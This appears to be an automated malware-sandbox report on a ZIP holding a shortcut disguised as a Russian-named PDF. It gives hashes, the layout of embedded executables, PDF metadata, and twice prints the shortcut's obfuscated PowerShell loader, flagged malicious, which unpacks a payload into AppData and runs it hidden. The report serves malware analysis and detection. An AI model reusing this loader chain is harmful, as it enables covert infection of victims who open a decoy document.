Infection Chain
Summary by MalvaGPT
Characteristics
Hash
Hash Value
MD5
4b94efa49fb59a43ac4a9fdf04c87ef6
Sha1
3d27e65ae5cb7aba8c529c8010b2414f24e4122b
Sha256
fe0d64d07ef03b2db6a7fa1ccbcc62c3f24f003d5f5726129ff22341321575b4
Sha384
c323040e6c4781e9c11aae78d12b763352f034702b323535ae13aeeb1382204c16c4e9f124824f4d01d1657c631360af
Sha512
63fda209808d66c4bce6d9550250217f1300cb57d6eeeefb8aa9d7da222a92bbb2ea96a43995be9a821303cd4656209810cf54e6f7aaa49681a71f50f19a32e5
SSDeep
393216:7xEj7DApaIMrPv0XmGWK4bEv7o7EPQGgdl:VE7G2GIg79Hkl
TLSH
30D633FE6BD2414A9B6221BBB0684FA0723041B47A098450FD97C7E9F2576D98B13CF7
File Structure
FOUND.000
primaryOutputCount
defaultDetailOutput
previousCommentCode
listFeedbackList
inactiveLabelResponse.xml
activeOutputPeriod.pub
[Authenticode]_681ef6a5.p7b
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
_RDATA
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:1033
RT_MANIFEST
ID:0002
ID:1033
[Authenticode]_98ba5cdb.p7b
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
_RDATA
.rsrc
.reloc
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
.xdata
.idata
.reloc
.symtab
externalTagName
activeOptionStatus
activeResourceList
activeOutputPeriod
primaryTaskName.xml
primaryPictureLimit
Proekt_prikaza_681_o_pooshrenii.pdf
#Stream {38}
#Stream {1260}
#Stream {1261}
#Stream {1262}
#Stream {1263}
#Stream {1264}
#Stream {1265}
#Stream {1266}
#Stream {1267}
#Stream {146}
#Stream {147}
#Stream {148}
#Stream {149}
#Stream {150}
#Stream {151}
#Stream {152}
#Stream {153}
#Stream {154}
#Stream {155}
#Stream {156}
#Stream {157}
#Stream {158}
#Stream {159}
#Stream {160}
#Stream {161}
#Stream {162}
#Stream {163}
#Stream {164}
#Stream {1273}
#Stream {1268}
#Stream {1269}
#Stream {1270}
#Stream {1271}
#Stream {1272}
Structure
[Authenticode]_a5d98da1.p7b
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
_RDATA
.rsrc
.reloc
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.buildid
.data
.pdata
.rodata
.tls
.reloc
[Authenticode]_d068fa0a.p7b
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
_RDATA
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:1033
RT_MANIFEST
ID:0001
ID:1033
finalActionCategory
lastCssName
nextValueDate
Informations
Name
Value
Proekt_prikaza_681_o_pooshrenii.pdf

1.7

Proekt_prikaza_681_o_pooshrenii.pdf

1

Proekt_prikaza_681_o_pooshrenii.pdf

D:20241031010650-07'00'

Proekt_prikaza_681_o_pooshrenii.pdf

Acrobat PDFMaker 22 for Word

Proekt_prikaza_681_o_pooshrenii.pdf

Proekt_prikaza_681_o_pooshrenii.pdf

D:20251212064115-08'00'

Proekt_prikaza_681_o_pooshrenii.pdf

Proekt_prikaza_681_o_pooshrenii.pdf

П Р И К А З

Proekt_prikaza_681_o_pooshrenii.pdf

Adobe PDF Library 22.1.117

Proekt_prikaza_681_o_pooshrenii.pdf

1

Proekt_prikaza_681_o_pooshrenii.pdf

MoBIL GROUP

Proekt_prikaza_681_o_pooshrenii.pdf

D:20241031010650-07'00'

Proekt_prikaza_681_o_pooshrenii.pdf

Acrobat PDFMaker 22 for Word

Proekt_prikaza_681_o_pooshrenii.pdf

Proekt_prikaza_681_o_pooshrenii.pdf

D:20251212064115-08'00'

Proekt_prikaza_681_o_pooshrenii.pdf

Adobe PDF Library 22.1.117

Proekt_prikaza_681_o_pooshrenii.pdf

D:20241031080647

Proekt_prikaza_681_o_pooshrenii.pdf

Artefacts
Name
Value
LNK: Command Execution

powershell.exe $externalModeType=([array](where.exe /r $env:USERPROFILE 'Proekt_prikaza_681_o_pooshrenii.zip'))[0].Trim(); &(\"Exp\" + \"and\" + \"-Arc\" + \"hive\") $externalModeType -D $env:APPDATA\totalValueThreshold; $externalModeType=$env:APPDATA+'\totalValueThreshold\FOUND.000\inactiveLinkOutput'; $visibleHtmlCount=$externalModeType+'.zip'; ren $externalModeType -N $visibleHtmlCount; &(\"Exp\" + \"and\" + \"-Arc\" + \"hive\") $visibleHtmlCount -D $env:APPDATA\davinciresolve; Start-Process -WindowStyle Hidden powershell (gc $env:APPDATA\davinciresolve\activeOptionStatus)

Deobfuscated PowerShell

(Get-Content $env:APPDATA\davinciresolve\activeOptionStatus)

4b94efa49fb59a43ac4a9fdf04c87ef6 (12.85 MB)
File Structure
FOUND.000
primaryOutputCount
defaultDetailOutput
previousCommentCode
listFeedbackList
inactiveLabelResponse.xml
activeOutputPeriod.pub
[Authenticode]_681ef6a5.p7b
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
_RDATA
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:1033
RT_MANIFEST
ID:0002
ID:1033
[Authenticode]_98ba5cdb.p7b
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
_RDATA
.rsrc
.reloc
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
.xdata
.idata
.reloc
.symtab
externalTagName
activeOptionStatus
activeResourceList
activeOutputPeriod
primaryTaskName.xml
primaryPictureLimit
Proekt_prikaza_681_o_pooshrenii.pdf
#Stream {38}
#Stream {1260}
#Stream {1261}
#Stream {1262}
#Stream {1263}
#Stream {1264}
#Stream {1265}
#Stream {1266}
#Stream {1267}
#Stream {146}
#Stream {147}
#Stream {148}
#Stream {149}
#Stream {150}
#Stream {151}
#Stream {152}
#Stream {153}
#Stream {154}
#Stream {155}
#Stream {156}
#Stream {157}
#Stream {158}
#Stream {159}
#Stream {160}
#Stream {161}
#Stream {162}
#Stream {163}
#Stream {164}
#Stream {1273}
#Stream {1268}
#Stream {1269}
#Stream {1270}
#Stream {1271}
#Stream {1272}
Structure
[Authenticode]_a5d98da1.p7b
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
_RDATA
.rsrc
.reloc
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.buildid
.data
.pdata
.rodata
.tls
.reloc
[Authenticode]_d068fa0a.p7b
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
_RDATA
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:1033
RT_MANIFEST
ID:0001
ID:1033
finalActionCategory
lastCssName
nextValueDate
Characteristics
No malware configuration were found at this point.
Artefacts
Name
Value Location
LNK: Command Execution

powershell.exe $externalModeType=([array](where.exe /r $env:USERPROFILE 'Proekt_prikaza_681_o_pooshrenii.zip'))[0].Trim(); &(\"Exp\" + \"and\" + \"-Arc\" + \"hive\") $externalModeType -D $env:APPDATA\totalValueThreshold; $externalModeType=$env:APPDATA+'\totalValueThreshold\FOUND.000\inactiveLinkOutput'; $visibleHtmlCount=$externalModeType+'.zip'; ren $externalModeType -N $visibleHtmlCount; &(\"Exp\" + \"and\" + \"-Arc\" + \"hive\") $visibleHtmlCount -D $env:APPDATA\davinciresolve; Start-Process -WindowStyle Hidden powershell (gc $env:APPDATA\davinciresolve\activeOptionStatus)

Malicious

4b94efa49fb59a43ac4a9fdf04c87ef6 > Proekt_prikaza_681_o_pooshrenii.‌‌‌‌‌pdf‌.lnk

Deobfuscated PowerShell

(Get-Content $env:APPDATA\davinciresolve\activeOptionStatus)

Malicious

4b94efa49fb59a43ac4a9fdf04c87ef6 > Proekt_prikaza_681_o_pooshrenii.‌‌‌‌‌pdf‌.lnk > LNK CommandLine > [PowerShell Command]

You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙